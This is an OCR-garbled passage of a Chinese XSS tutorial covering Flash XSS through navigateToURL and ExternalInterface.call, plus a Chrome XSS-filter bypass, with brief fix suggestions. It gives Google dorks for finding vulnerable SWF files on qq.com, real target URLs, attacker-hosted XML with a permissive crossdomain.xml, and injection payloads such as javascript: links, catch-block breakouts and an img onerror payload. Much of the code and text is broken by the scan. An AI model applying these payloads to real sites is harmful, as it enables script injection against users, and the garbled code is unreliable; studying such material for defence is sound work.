最 后 利用 代码 。 





http://www.discuz.net/connect.php?receive=yes&mod=10ogin&op=callbacl 
| 。。 
可 以 看 到 ， 效 果 一 样 ， 这 次 融 不 会 发 生 跳 转 从 而 导致 加 载 JS 失败 咯 。 


WWW.discuz.net/cor 





rs a 
] 志 十 苦 上 符 训 和 二 记 上 上 
hE 





从 www.discuz.net 上 的 网 页 显示 : 











Utma=128593049,.730193852,.1348766963,134876696 
3.1348766963.1; 





快 樟 导 舱 


修复 方案 


过 滤 挥 NA\ 


14. Flash Xss 人 入门 [navigateToURL] 


来 源 : 14. Flash Xss 入 门 [navigateToURL] 








简要 摘 述 


接 下 来 ， 我 们 将 讲解 Flash Xss。 由 于 乌云 及 社会 各 界 的 白 帽 子 的 上 报 ， 腾 讯 目前 
已 经 对 绝 大 多 数 可 能 存在 问题 的 Flash 进行 了 修复 。 使 得 我 在 寻找 真实 案例 时 看 实 
厅 烦 了 不 少 。 但 是 为 了 使 得 本 教程 足够 完善 和 系统 ， 我 还 是 很 艰难 的 找 出 了 一 些 可 
以 参考 的 例子 。 例 子 本 身 危害 可 能 不 大 ， 但 是 希望 能 够 借助 例子 给 新 手 们 描述 清楚 
比较 基本 的 东西 。 


Flash 的 actionscript 脚本 目前 网 络 上 存在 2 种 版 本 ， 即 2.0 与 3.0， 本 次 教程 先 以 
as3.0 为 例 。 同 时 教程 还 会 在 如 何 使 用 搜索 引擎 搜 索 ， 如 何 查 找 关 键 词 及 构造 利用 
代码 方面 进行 详细 的 讲解 。 


详细 说 明 


1. 首先 ， 第 一 步 ， 我 们 需要 找到 存在 缺陷 的 FLASH 文件 。 如 何 找到 这 类 文件 呢 ? 
最 好 的 办 法 ， 当 然 是 GOOGLE 搜索 。 但 是 其 实 很 多 人 是 不 太 会 用 搜索 引擎 。 或 者 
知道 和 剑 么 用 ， 但 是 不 知道 该 如 何 搜索 关键 词 。 因 而 教程 的 开始 ， 我 们 来 说 一 说 ， 如 
何 搜索 天 键 词 。 


2. 基本 语句 肯定 是 site:qq.com filetype:swf 意思 是 ， 限 定 域名 为 qq.com 文 
件 类 型 为 FLASH 文件 。 


3. 显然 这 样 会 搜索 出 很 多 FLASH 文件 ， 不 利于 我 们 后 续 的 漏洞 查找 ， 所 以 我 们 需 
要 输入 示 个 关键 词 来 进一步 缩小 沁 围 。 这 里 我 让 举 一 些 寻 找 天 键 词 的 万 式 。 


1. 已 知 存在 缺陷 的 FLASH 文件 名 或 参数 名 ， 如 : swfupload,jwplayer 等 


2. 多 媒体 功能 的 FLASH 文件 名 ， 如 : upload，player, music, video 等 3.3 调用 的 
外 部 配置 或 数据 文件 后 级 ， 如 : xml, php 等 


3. 前 期 经 验 积 累 下 来 的 程序 员 特 征 参 数 名 用 词 ， 如 : callback, cb , function 等 


4. 结合 以 上 经 验 ， 本 例 使 用 其 中 第 三 条 : 我 们 搜索 : site:qq.com filetype:swf 
inurl:xml 可 以 找到 这 个 FLASH 


http://imgcache.qq.com/liveportal vi/swf/carousel.swf?v=20101111&dl 





5. 如 果 你 对 FLASH 有 一 定 了 解 或 者 你 天 资 联 蕊 的 话 ， 通 过 以 上 地 址 ， 你 或 许 能 猜 
到 这 个 FLASH 会 调用 http://v.qq.com/doco/pic.xml 这 个 XML 文件 的 数据 ， 为 了 看 
看 是 什么 数据 ， 我 们 可 以 使 用 抓 包 软件 【这 里 我 使 用 的 是 charles web proxy】 来 看 
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看 。 


3 雯 http:/iimgcache.ggq.com 
: EE 全 lwepertal _v17 
二 
| -全 carousel. Se 2010111]8udp=http: /v.99. dh 





\ -图 favicon.ico \ Ee 
村 1 http:/ fv.q9. 3 

: 时 doco/ ie 

: : Pe pic.xml 被 而 用 


6. 我 们 看 看 http://v.qq. So xml 的 内 容 ， 对 应 看 FLASH 来 看 。 


惨 i WT ea a 









= 一 = Vqgcom/doco/picxml 
swtv=201011ii&dp=http:/nt ee i wr 77 “| 三 Nl Dvag 上 co/pi 












This NL file does not appear to have any style inf 
Se es associated with it, The document tree is show belc 

点 击 这 个 图 片 的 时 假 ， 会 跳 转 到 这 个 地 : ~ 

| root> _ 

和 雷 记 1 

sd 0 si 

bpurlohittps 六 本 gd: COM zt/ cwib, html<d/ bpurly 







宕 - 坟 是 工 二 六 机 二 
—— http ingl. etimg: com wpics/hyvl/2d3/21B 1 157 T5289 
Fl» 





tn A qq Cm Tt owrb, htnld link: 
| < CDATAl 厨 王 争 痢 : 国际 项 级 车 世 友 赛 ! ]]》 
-Ee title» 
he 局 主 争 等， es 大 赛 ! | I , 加 
1 [EDAT . 三 国 挑 ; a 
| 葬 户 下 人 秃 栏 目 挑 战 时 量 ， 挤 卫 荣 涂 ， a | te ee en 
| 1t Bm 























TH TR 
[i 


| tt a i 
be 区 卫 和 让 本 本 和 忒 村 工 攻 再 硬 I 殿 有 关照 
he It, tn | ‘COM 


由 tt 


7. 这 里 我 们 重点 关注 的 是 xml 里 的 <Link> 结 点 。 也 就 是 当 我 们 点 击 图 片 时 ， 
跳 转 到 link 所 指向 的 地 址 。 


8. 接 看 我 们 先 说 下 基础 知识 。 要 实现 上 面 点 击 图 片 ， 打 开 链 接 的 功能 ， 在 FLASH 
里 通常 以 以 下 代码 来 实现 的 。 当 图 片 点 击 时 执行 函数 A 


函数 A 内 容 如 下 : 





//as3.0 版 本 
navigateToURL(new URLRequest(1ink), "_self™"), 
//as2.0 版 本 getURL(link,"_self"); 


其 中 link 束 是 被 打开 的 链接 。 


9. 但 是 这 里 存在 一 个 问题 ， 如 果 link 是 "javascript:alert(1)" 那么 就 可 以 执行 JS 代 
码 了 。 这 里 的 点 击 执行 代码 的 效果 类 似 于 网 页 里 的 


<a href="javascript:alert(1)"> 点 我 弹出 1</a> 


10. 基于 以 上 基础 知识 ， 我 们 可 以 先 来 反 编译 一 下 腾讯 的 FLASH 文件 ， 看 看 是 不 
是 上 面 这 样 的 。 这 里 我 用 到 的 反 编 译 软件 是 actionscript viewer 2009。 
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把 下 载 好 的 FLASH 文件 ， 拖 到 软件 里 ， 然 后 把 AS 都 保存 出 来 ， 保 存 为 文本 文 


件 。 













le Ud Optone Windew Halp, 
节 园 国 国 |# “* 国 | 全 电器 | 加 | 曾 

Snels[dae OD om 
ER 区 I IE 二 








图 刻 点 击 时 收 线 行 和 站 教 


:有 DUSeEL ent FOI 








rate Tm To PI ekENandlel are) 
yar data: 三 rull; 
var event':* 三 arel: 和 
var item:* = (event. currentTarget“as Picltem), 
data = Ttem getDatal,). 
this. reportClick(data} . 
setTimeout (function 0 1 Ms 


if (C(tdata) Bh fdata Link))) 过 


和 navigateToURL (new URLRequest (data. ct 名 腾 归 
}, 109 1 si | 














1 


如 上 图 ， 我 们 可 以 看 到 AS 代码 具有 目录 结构 ， 这 种 是 AS3 的 。 如 果 不 是 这 样 目 录 


的 样子 ， 则 是 AS2 的 代码 。 由 于 我 们 要 定位 的 是 使 用 到 link 的 代码 。 


存 的 as 代码 ， 进 行 搜索 。 


可 以 看 到 ， 当 点 击 图 片 时 ， 章 接 将 数据 里 的 link 作为 参数 传递 


中 。 


11. 既然 如 此 ， 我 们 把 http://v.qq.com/doco/pic.xml 给 下 载 下 来 ， 


将 xml 文件 里 的 <lLink> 部 分 修改 一 下 。 


<5id>3</5id> 

<bpurls>/video/play.html?vid-9aeIxCHvars</bpur ]> 

<Uurlshttp:/ imgl. gtimg. Com vi/pics/hvi/ O01356/1162 7 5598920.] 
<|ink-amsenipe le .Nink> 

<titles<! [COATA[S 径 后 的 血色 利益 链 ] ]>< /TIE Ge> 


人 图 410 年 让 塞 要 赛 日 原 : 全 丐 探 生 ]]><7subtit 
</ Item 
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到 了 URLRequest 


我 们 打开 保 


062 


12. 上 传 修 改 后 的 pic.xml 到 我 们 自己 的 服务 器 。 





所 CC Litsokla.duapp.com/picxml| 苇 到 了 我 们 自己 的 服务 车 
WE 
itemy 
备 必 让 自明 
sidy 3 sid> 
bpurly /video play, htnl?rid=dae lan Wd bpurl» 
二 El 
http: Hingl. eting. CR ca jp 






vetities 
<1[cDATAL[ 乞 童 背后 的 血色 利益 猴 ]]> 下、 
/titles 修 站 后 的 肉 容 > 


有 一 


13. 这 样 一 来 ， 腾讯 的 http://imgcache.qq.com/liveportal v1/swf/carousel.swf 就 会 
跨 域 加 载 我 们 的 http://itsokla.duapp.com/pic.xml 文件 。 


14. 既然 是 跨 域 加 载 ， 有 必要 说 点 基础 知识 。 FLASH 跨 域 请 求 的 流程 大 致 如 下 : 


http://fimecache.qg.com/liveportal vi/swti/carousel.swt 


访问 女 忻 之 前 ， 会 先 访 则 crossdomain.xml 
看 看 是 否 交 许 来 自 imgcache.qq.com 的 访 加 | 


http:/ /itsokla.duapp.com/crossdomain.xml 


OSS-doRalin-poliey 
al low=access-tfron domaina dh wooyu, Org /> 

‘Bl lowiGGe0rs-fronm domairnes PA 
eross-donain-policy, 


如 果 苑 许 来 自 的 域名 中 含有 i 







” 准 续 访问 


http:/ /itsokla.duapp.com,/pic,xml 
15. 因而 ， 我 们 要 允许 来 自 imgcache.qq.com 的 FLASH 文件 ， 访 问 我 们 的 xml 文 
件 才 行 。 
在 我 们 自己 网 站 的 根 目 录 下 ， 放 和 置 一 个 crossdomain.xml 
<?xml1 version="1.0"?> 
<cross-domain-policy> 


<allow-access-from domaln= .qdq.com /> 
</cross-domain-policy> 


16. 最 后 ， 看 看 我 们 的 效果 。 点 击 图 片 时 ， 触 发 。 
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imgcache. q9: com/livel eportal_v l/sw carouse el.swfiv=2010111 lmadp=http:/ /itsokla.duapp.com/picxml 





修复 方案 


对 XML 中 传人 的 link url 进 








a 和音 衣 后 区 thi 痢 和 六 和 


= FU - 


行 正 则 判断 或 者 限制 加 载 第 三 方 网 站 的 XML 文件 
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15. Flash Xss 进 阶 [Externallnterface.call 第 一 个 


人 参数] 


来 源 : 15. Flash Xss 进 阶 [Externallnterface.call 第 一 个 参数 ] 


简要 摘 述 


除了 上 一 节 讲 到 的 navigateToURL/getURL 之 外 呢 ， 另 一 个 经 常 存 在 XSS 缺陷 
的 as 男 数 就 是 ExternalInterface.call ， 此 加 数 作 为 FLASH 与 宿主 页 面 
javascript 通信 的 接口 ， 一 般 来 说 ， 有 "2” 个 参数 ， 第 一 个 参数 为 所 调用 js 函数 名 ， 
后 续 的 其 他 参数 则 为 所 调用 的 js 函 数 的 参数 。 那 么 在 参数 可 控 的 情况 下 ， 不 论 是 
第 一 个 参数 或 是 后 续 参 数 可 控 ， 我 们 均 能 加 以 利用 实现 XSS。 本 节 先 说 一 说 第 一 个 
参数 可 控 的 情况 。 


1. 先 从 程序 员 的 角度 说 下 基础 知识 ， 有 了 时候， 我 们 需要 在 FLASH 里 调用 当前 页 
中 的 Re ep 函数 ， 例 如 : 一 个 简单 的 需求 ， 我 们 要 在 游戏 加 载 完成 后 ， Se 
出 1 的 操作 


javascript 代码 : alert(1) 
as 代码 ExternalInterface.call("alert","1"); 
2. 有 的 程序 员 束 会 觉得 ， 直 接 弹 出 1 太 各 了 吧 。 于 是 他 目 己 写 个 js 的 函数 


function myalert(str)t{ 
// 显 示 一 个 漂 腕 的 浮动 层 ， 并 且 把 str 显示 在 上 面 。 
} 


然后 在 as 里 ExternalInterface.call("myalert","1"); 


3. 又 有 一 天 ， 另 外 一 个 程序 员 觉得 上 面 那 个 程序 员 写 的 东西 不 错 ， 但 是 他 的 JS 画 
数 名 不 叫 myalert， 于 是 喊 那 个 程序 员 改 下 as 代码 。 于 是 那个 程序 员 觉得 ， 免 得 
以 后 老 是 有 人 喊 我 改 代 码 ， 他 就 将 代码 写成 了 下 面 这 个 样子 。 


var func:String=root.loaderInfo.parameters.func; // 接 受 FLASH 所 带 的 
ExternalInterface.call(func,"1"); 





[这 样 一 来 ， 其 他 想 用 这 个 FLASH 的 人 ， 不 需要 修改 FLASH， 只 需要 调用 FLASH 
的 时 候 带 上 参数 即 可 。 比如 我 的 JS 画 数 是 newalert, 我 只 需要 按照 下 面 这 么 调 
用 : http://some.com/xxx.swf?func=newalert 


4. 上 述 过 程 提 高 了 程序 的 可 重用 性 ， 为 开发 人 员 带 来 了 极 大 的 便利 ， 但 是 却 是 缺乏 
安全 者 虑 的 。 攻击 者 可 以 采用 以 下 的 方式 来 执行 目 己 的 代码 


http://some.com/xxx.swf?func=(function({alert("hi jack )}) 


5. 为 了 方便 理解 ， 我 们 可 以 将 


ExternalInterface.call(" 辑 数 名 ", "参数 1")， 


看 成 JS 里 的 


图 数 名 ("参数 1")， 


而 FLASH 里 实际 最 后 执行 的 JS 代码 ， 形 式 如 下 (至 于 下 面 这 名 哪里 来 的 ， 暂 时 
不 表 ) : 

try { flash toXML( 阔 数 名 ("参数 1")) ; } catch (e) { "<undefined/>"; 
4 启 强 ! 
因而 函数 名 部 分 也 可 以 写 为 (function(){alert("hi jack")}) 的 形式 。 


6. 上 面 说 的 是 理论 基础 ， 有 了 这 个 基础 ， 我 们 来 看 实例 ， 就 比较 简单 了 。 
http://quan.qgq.com/swf/swfupload.swf 
7. 怎么 反 编译 ， 见 上 一 篇 。 我 们 来 看 怎么 查找 缺陷 。 


8. 因为 这 是 一 个 AS3.0 的 FLASH 文件 ， 我 们 百 先 确 定 FLASH 是 否 有 接受 参数 。 
as3.0 接受 参数 的 方法 ， 所 有 参数 存放 在 root.1loaderInfo.,parameters 对 象 
里 。 例如 aaa.swf?a=1&b=2&c=3 ,那么 root.loaderInfo.parameters 则 等 


{ 
a 
四 国定 2 
ee 
} 


9. 我 们 可 以 定位 到 movieName 变量 


那些 年 我 们 一 起 学 XSS 


查找 内 音 凶 ): loaderInfs 


方向 
辣 区 势 大 小 瑟 化 】 。 守 向 上 如 向 向 下 如 


akiroot. loaderli 


























} wth er Object) | 
self. SetButtonDisabledlfalse,): 


i stage. addChildtimey). 
this. movieName = decode[RIComponent (root. EE paraneta 


可 以 看 出 ，FLASH 的 movieName 参数 ， 存 放 到 了 this.movieName 中 。 


10. 进一步 ， this.movieName 被 带 入 了 到 了 this.flashReady_Callback 及 


相同 上 届 向 向 下 改 ) 





this, ti1leDalogotart Lallback = SH pl oad instances \ + this.movielNlame) + 
this, fileQueued Callback = ({"SWFUpload, instances[\”” t this. movieName) + 中 让 

this, fileQueueError Callback 三 【人 MEUpl oad. instances["”” + this. mvieName) + “ 
this. fileDialogComplete Callback = (( SWFUpload. instances[\ + this. movieName) 
this. uploadStart Callback = ((" SWFUrload. instances[\” + .this. movieName) 十 “所 | 
this. uploadProgress Callback = ((”SHFUpload. ee + this. movieName) + 

this, uploadError Callback 三 站 人 SWF Upload. instances[\” this oviname) + “\"] 
this. UploadSuceess Callback = ((” oad inetances[ a eh i 3 
this. uploadComplete Callback = (( FUpload instancesl[ , 
this, debue Callback = (( SWiUsload, instances[\ + this.moviel 





this.flashReady_Callback = (("SWFUpload.instances[\"" + this.moviel 
到 ER | 





11. 我 们 再 进一步 看 看 ， this.flashReady_Callback 被 用 到 了 哪里 。 





} pe es 
this,.Debuell Callbacks where not set: © + ex. mess 
return; 


ExternalCall. Sinmle (this. Gee ee). 


12. 再 接着 看 看 调用 this.flashReady_Callback 的 Simple 男 数 是 哈 样 子 的 。 


15. Flash Xss 进 阶 [Externallnterface.call 第 一 个 参数 ] 67 


public static unctIon argl:String) :yoid1! 
Externallnterface, callt argl): 


3 
public statice function FileQueueError( argl :String, arg 
ExternalInterface, callt_arel, Escapellessagel arg3), 


public static function Generic( argl :String, ... _args) | 
Var locald:*: 
var local3:hrray = []， 
for Each ( locald in ares) | 


| Dn | 
| 方向 
区 人 身 大 小 写 丰 时 有 上 如 向 下 





= 


可 以 看 到 ， 最 终 这 个 参数 被 放 到 ExternalInterface.call 的 第 一 个 参数 中 执行 
于 沪 

13. 是 不 是 很 激动 。 我 们 来 假设 一 下 ， 按 下 面 调用 FLASH 
http://quan.qq.com/swf/swfupload.swf?movieName=aaaaaaaa 堵 么 


this.flashReady_ Callback 残 等 于 以 下 内 容 。 
SWFUpload.instances|"aaaaaaaa" | .flashReady 


最 终 调用 的 是 
ExternalInterface.call( SWFUplLoad .Instances| aaaaaaaa | .flashReady' 


14. 如 果 我 们 要 调用 自己 的 JS 代码 ， 就 需要 构造 闭合 ， 但 是 你 会 发 现 有 一 定 问 
题 。。 我 们 最 多 能 够 造成 下 面 的 模样 。 


ExternalIinterface.call('SwFUpload.instances["aaa"]; 
function SWwFUpload( ){}; 
SwFUpload["aaa"].flashReady' ); 


但 是 这 样 是 无 法 正确 执行 的 ， 因 为 SWFUpload.instances 没有 被 定义 ， 从 而 
SWFUpload.instances["aaa"] 会 失败 。 


15. 怎么 办 呢 ? 这 里 就 要 拿 出 我 们 第 5 步 里 的 知识 了 。 我 们 把 “ 范 数 名 ” 换 成 call 的 
第 一 个 参数 内 容 。 变 成 下 面 的 形式 。 


try { flash toXML(SWFUpload.instances["aaaaaaaa"] .flashReady(" 参 数 
回 = + 
我 们 再 基于 以 上 代码 来 构造 ， 





try { flash toxXML(SWwFUpload.instances["aaa"|)}catch(e){alert(1)};/, 
jl” ”””° 
片 解析 : 





)1oad. instances["aaaaaaa 吉 '] .fl1ashReady(" 参 妾 1")) ; } catch (ey 1 "<undefined/>"; } 
人 构造 如 下 。 


iload. instances[ Baa FrCatCmeJtarerTklriyH ] fl1ashReady( 基地 1 )) ; } catch (e) i 


try 1{ 
flash toXML(SWFUpload.instances["aaa"]) // 此 行 代码 ， 因 为 SWFUp1oa 


Ycatch(e)t 
alert(1); // 这 里 将 会 被 执行 。 
上 
//"].flashReady(" 参 数 1")) ; } catch (e) { "<undefined/>"; } 


[IE “== 
16. 最 后 ， 我 们 把 构造 的 代码 ， 放 进 FLASH 的 参数 里 











http://quan.gqq.com/swf/swfupload.swf?movieName=aaa" |)}catch(e)t{alel 


| 上 | 
可 以 看 到 成 功 执 行 alert(1) 

















= ; “ny = = = pF 


由 上 -=; tt 日 看 Br 可 可 -EGG swt/swtupload,swt movieName=ana jlcatchteHale 训 = 量 已 i 各 quan.q9 
了 ”| 榨 地 上 传 
:地 上 传 ”二 地 上 人 
李 地 上 仿 


地 地 寺 伟 




















ae 人 (iT 


修复 方案 : 
对 传人 call 的 字符 串 进 行 判 断 或 过 滤 操 作 。 


16. Flash Xss 进 阶 [Externallnterface.call 第 二 个 


人 参数] 


来 源 : 16. Flash Xss 进 阶 [Externallnterface.call 第 二 个 参数 ] 


简要 摘 述 


讲 完 Externallnterface.call 的 第 一 个 参数 ， 我 们 搂 着 来 讲 第 “2 "个 参数 ， 之 所 以 2 打 
上 引号 ， 因 为 call 函数 的 原型 是 : 


call(functionName:String，... arguments):* ， 即 后 面 可 以 有 很 多 很 多 个 
人 参数， 我 们 统称 为 第 2 个 参数。 有 时 候 我 们 会 过 到 
ExternalInterface.call("xxxxx", "可 控 内 容 "); 的 情况 ， 那 么 这 种 情况 下 ， 如 
何 构 造 XSS 呢 ? 


1. 有 了 上 一 节 教 程 的 基础 ， 这 次 我 们 下 接见 实例 。 


通过 GOOGLE 搜索 ，site:qq.com filetype:swf inurl:xml 我 们 可 以 找到 以 下 
FLASH。 


http://imgcache.qq.com/gqzone_v4/2/default menu_horizontal.swf?xml :| 
| 


2. 借鉴 上 上 节 教 程 的 思路 ， 我 们 可 以 看 看 
http:Wimgcache.qq:cor/qzoney/client/custom_menu/custom_ menu.xml 里 是 个 什么 
内 容 。 


<?xmMml version="1.0" ancoding="UTF-8"?»> 
- <hnavigation»> 

<meny href="1" name=" 王 内 "/S 
<meny href="2" name=" 日 志 " /Ss 
zmenu href="3" name=" 彰 朱 辣 "/> 
zmenu href="4" name=" 留 言 概 "> 
<Imenmu href="5"” name=" 相 册 "/> 
<menuyu href="6" name=" 建 浆 屋 "> 
<menuyu href="7" name=" 个 大 箔 " > 
zmenu href="8" mame=" 好 到 尊 " /> 

</navigation> 


3. 好 像 看 不 出 来 是 个 哈 用 途 ， 我 们 反 编译 FLASH 文件 。 



















Frames 





TYPE 
IFrame action 





Library 
Wew List by SWF Bhd Find: 


Lacation 









[Timeline 


ea Tags Te 


区 | 6 tterms listed. 


Instance of 


| 
i Frame action 国 symbol 15 Moviedli,,. | 并 2B {2act.,,, 
[a Clip action symbol 15 MowvieCli,,, 第 1 {selected me} Sy... 365B {ac,., 
i Frame actian symbol 15 MovieCli,,. 2 2B (2 act.,, 
i Frame action 图 symbol 15 Mowiecli， 3 28 (2act,.. 
i Frame action 男 symbol 22 Moviecdli;,. 吕 4KB (109.,,, 


这 里 显示 是 这 样 一 行 


一 行 的 , 就 是 sa COm 





4. 接 看 我 们 先 看 看 是 否 


cll 


方 回 


曾 向 上 Wi 富 向 到 ) 


fimction item onFReleaset) | 

var local? = Mmbertithis. parent. 
setSelectedt local2J 

tlash. external. External lntertace. 
this. parent. eotobndstop ly 


可 以 看 到 ， 我 们 搜索 到 的 是 下 面 这 句 : 





_name. splitt” “)[2]): 


= ne 
a stom menu swt”, 


gs ExternalInterface.call 之 类 的 。 





IIUEIILL ar A Es 


flash.external.ExternalIinterface.call("custom menu_swf", 


加 | 
那么 call 的 


第 一 个 参数 是 令 限 定 死 了 一， 
menu_array[_local2].href ， 如 果 你 对 AS 有 一 


menu_array 是 一 个 数组 ， 那 么 


义 “ 菜 单数 组 ?我 们 不 难 联 想到 上 面 xml 文件 里 的 数据 。 


二 并 让 上 问 记 总] 和 3 


下 menu_array[_local2] href) | 


5. 换 人 句 话 说 ， 


下 来 












| FiETTEEERamE= 好 点 这 
‘<navieation> | 


这 里 我 们 的 可 以 控制 call 的 第 2 个 参数 。 同 教程 14 中 的 方法 ， 我 们 














第 2 个 参数 为 


点 了 解 ， 不 难看 出 
_local2 应 该 束 是 数组 的 下 标 ， 
bject. definePropertwyiwindow, close’ 


functioniti{ } 1): Object. definePrope 
‘open ， 4{ walue: functiont}! 1 1);} 
< script> 
name= 二 [x ret=| 
riame=" 日 href-[2 > 
name=" 首 和 牛 . 意 失守 

rame= "留言 href+"d" /> 
name= “ 相 册 ” href= 15 A 
name=" 六 你 屋 屋 1 i BA 


rame= "让 凡 档 ?Phret+ 


menu_arra 


而 从 单词 合 


http://imgcache.qq.com/gqzone/client/custom menu/custom menu.xml 。 
了 一 卫 
先 做 点 修改 ， 然 后 上 传 到 目 己 网 站 上 。 我 们 将 代码 里 日 志 那 一 行 的 href 改 掉 。 


<menu name=" 日 志 " href="\&quot;,alert(1)" /> 


上 传 修 改 后 的 文件 ， 同 时 记得 将 crossdomain.xml 上 传 至 自己 的 网 站 根 目 录 下 哦 一 
一 〈 见 教程 14) 


6. 接 看 我 们 载 人 我 们 目 己 指定 的 XML 文件 。 


http://imgcache.qq.com/gqzone_v4/2/default menu_horizontal.swf?xml :| 
加 ss 


7. 接着 我 们 打开 Firefox 浏览 器 。 有 人 会 问 ， 你 怎么 突然 要 用 Firefox 啊 ! 的 
和 1 1 同志 们 ， 我 没 疯 ， 只 是 因为 FF 可 以 捕获 到 这 里 的 错误 ， 而 chrome 捕获 
到 | 





我 们 打开 Firefox 后 ， 访问 上 面 的 地 址 ， 点 击 【上 日记】 按钮 1 1 Ctrl+shift+J 打开 
错误 控制 台 1 可 以 看 到 以 下 报错 ! 





a012/12/25 20:13:13 
err missing ) after argurment list 






1 eatch 2 - ns } 





ee a _toRML Eus tom _ menu swf "’, on 2 Rl 


8. 记性 好 的 朋友 ， 会 马上 想起 上 一 节 里 我 们 说 到 的 。 





ExternalInterface.call(" 辑 数 名 ", "参数 1"); 


实际 上 执行 的 是 以 下 内 容 ， 
try { flash toXML( 辑 数 名 ("参数 1")) ; } catch (e) { "<undefined/>"; 
0 


我 们 束 是 从 FF 这 里 捕获 错误 到 这 和 点 的 ! (:) 当然 也 还 会 有 其 他 方法 ) 。 为 什么 会 
出 错 呢 ? 我 们 一 起 来 看 看 。 


9. 当 我 们 操 击 ( 忘 | 按钮 时 ， 会 调用 。 





flash.external.ExternalIinterface.call("custom menu_swf", menu_arra' 
4] 和 


而 menu_array[_local2].href 等 于 \",alert(1) , 进而， 我们 代入 完整 的 代 
码 ， 即 如 下 : 





try { flash toxXML(custom menu_swf("\\",alert(1)")) ; } catch (e) { 
4 ee 
转换 过 程 如 下 图 : 








flash.external.Externalinterface.call{ custom meny swf ,meny array[ local2].href}; 


进行 一 次 冶 引 志 转 疙 





Walert(1 


COm 
try{_ flash toxML{(custom menuy swf{"M",alert(1}|));}catch( 


可 以 看 到 转换 之 后 ，JS 代码 有 点 乱 ， 引 号 到 处 飞 ， 插 号 无 处 寻 ， 因 而 报错 了 | 
10. 那么 我 们 怎么 构造 正确 的 利用 代码 呢 ? 其 实 有 上 一 节 的 知识 并 不 难 |! 





try { flash toxXML(custom_menu_swf ("构造 点 构造 点 ")) ; } catch (e) {" 
加 
首先 第 一 步 ， 要 注入 自己 代码 ， 首 先 要 闭合 掉 双 引号 | 





try { flash toXML(custom_menu_swf(" 构 造 点 "),alert(" 构 造 操 ")) ; } cat 
司 E 和 人 


但 是 从 上 面 转换 流程 ， 我 们 可 以 看 到 ， " 会 变 成 \" , 即 变 成 了 下 面 的 样子 ， 还 
是 突破 不 出 去 。 





try { flash toXML(custom_menu_swf(" 构 造 点 \"),alert(\" 构 造 筷 ")) ; } ct 
Es 二 = 





字 付 申 
-|| 透 趟 出 玫 行 串 的 车 败 啊 ， 


try {flash_ teXMUSustem_menu_swff" 忆 造 点 Vialertfw 税 过 操 四;}catch (e) 

{' =undefined/>"; } 

不 过 非常 庆 季 的 事情 是 ， 这 里 没有 对 \、 进行 转 义 。 我 们 可 以 通过 输入 \" 来 构 
造 。JS 的 字符 串 里 ， 入 用 \\、 表 示 。 如 下 : 


try { flash toXML(custom_menu_swf(" 构 造 点 \\"))}catch(e){alert(1)}//; 


图 片 分 析 如 下 : 





执行 我 们 自 “ 后面 局 广 糙 
计生 四 己 的 代码 挥 了 了 


人 | 


t tilash toXMLicustom menu swWt(" 造 点")) catchle alerty 可 
ry {_ flash teXMHScustem_menu_swf : 





:二 


catch [e) {<undefined/>"; ] NE 
11. 罗 味 了 这 么 多 ， 我 们 把 构 逅 态 代 码 ， 拿 出 来 ， 插 入 到 XML 文件 里 。 注 蕊 以 下 几 


11.1 最 后 构造 的 代码 是 \\" ,实际 我 们 的 输入 是 \" ， 然 后 由 FLASH 自己 转变 
为 NA 的 ， 因而 利用 代码 里 只 需要 俞 人 NI 即 可 。 


11.2 由 于 在 XML 的 节 扣 属 性 里 ， 双 引号 写 为 &quot，; 

<menu name=" 日 志 " href=" 构 造 点 \&quot;))}catch(e)f{alert(1)}// 构 造 点 " 
剧 EEEEEEEEEEE 王 王 二 天 到 
12. 再次 上 传 文件 。 打 开 





http://imgcache.qq.com/gqzone_v4/2/default menu_horizontal.swf?xml i 
加 二 
点 击 日 志 ， 看 看 效果 。 





那些 年 我 们 一 起 学 XSS 


二 imgcache.qqicom/qzone_v4/2/default_menu_horizontal, 全 个 了 C | | 图 皇 这 <Cw/zK: 
多 | 火狐 官方 站 点 新手 上 路 | | 常用 网 址 [建议 网 站 和} 网 页 快讯 库 











修复 方案 


1. 禁止 调用 第 三 方 的 外 部 XML 文件 。 


16. Flash Xss 进 阶 [Externallnterface.call 第 二 个 参数 ] 


17. XSS 过 滤 厨 绕 过 


来 源 : 17. XSS 过 滤器 绕 过 [通用 绕 过 |] 


简要 拍 述 

关于 反射 型 的 基本 东西 ， 暂 时 就 到 这 啦 ， 如 果 后 面 有 什么 好 的 case， 再 做 增补 。 最 
近 ， 有 些 人 会 问 到 怎么 绕 过 浏览 器 的 XSS 过 滤 器， 所 以 从 这 节 开 始 ， 给 出 点 绕 过 
的 例子 。 当 然 这 些 绕 过 浏览 器 的 方法 ， 不 是 万 能 的 。 不 同 浏览 上 器， 不同 场景 都 会 存 
在 焉 异 。 满 足 场景 要 求 时 ， 才 可 以 使 用 。 

此 文 给 出 的 是 一 个 来 自 sogili 分 享 的 chrome 下 绕 过 过 滤器 的 方法 ， 在 腾讯 某 义 
XSS 上 的 应 用 。 这 一 类 都 算是 “结合 了 一 定 场景 ”， 绕 过 了 浏览 器 自身 的 防御 机 制 |， 
具有 一 定 的 通用 性 ， 我 们 称 为 "通用 绕 过 ”( 贞 起 的 名 字 ， 别 在 意 ) 。 但 是 在 后 续 版 
本 的 浏览 器 中 ， 这 些 技巧 可 能 会 被 浏览 器 干掉 从 而 失效 。 再 次 强调 : 通用 不 是 全 部 
都 行 ， 意 思 是 所 适用 的 场景 实际 发 生 的 概率 比较 局 | 


详细 说 明 
1. 其 实 就 是 个 普通 的 XSS 点 ，uin 参数 没有 对 任何 字符 进行 过 滤 。 
http://bangbang.qq.com/php/login?game=roco&uin|l(http://bangbang.qq 


A | 和 


2. 正 是 由 于 这 个 点 什么 都 没 过 滤 ， 浏 览 器 目 身 的 防御 机 制 也 最 好 发 挥 作 用 ， 瞧 瞧 ， 
chrome 拦截 了 。。 





© [bangbang.qq.com/php/login?game=roco&uin="s <img%20src=1%20onerror=alert(1)s& 





部 帮 精 如 





i = | b= a EF fa [L 司 | i 
|Elements 1 天 |Resources Hetwork BD Souces eine LL Fr 人 lles 入 hudits 


Wu Reused to execute a Javascript script, Source code otf stript tound within regqguest, 
亡 所 








i 
[| 
过 
I 


加 "alle oO Joad FesouUrnrce: ThNe- server Pesphorfded With a . statys Qf 4d: 
PResource linterpreted as Image but transterred with MIME type text/plain: “http://pinetfore 
apwvid=61S2140598escr=13X Edascl=32-bitgelane=zh-=-chalava=lgcc=uUndetlinNnedep=WIN32atr 





二 E 3 ~ -- 
= 一 加 是 上 可 
Qavs=tcss,.3.1, Taext=ui%3D087488045808%3Bche3D1%3Bs1i%3D1I?722249882%3Btm D7 arand=62328Lreservie -fl". COm 
a 


tte: /pic, vided;g9. Om SlilS: 


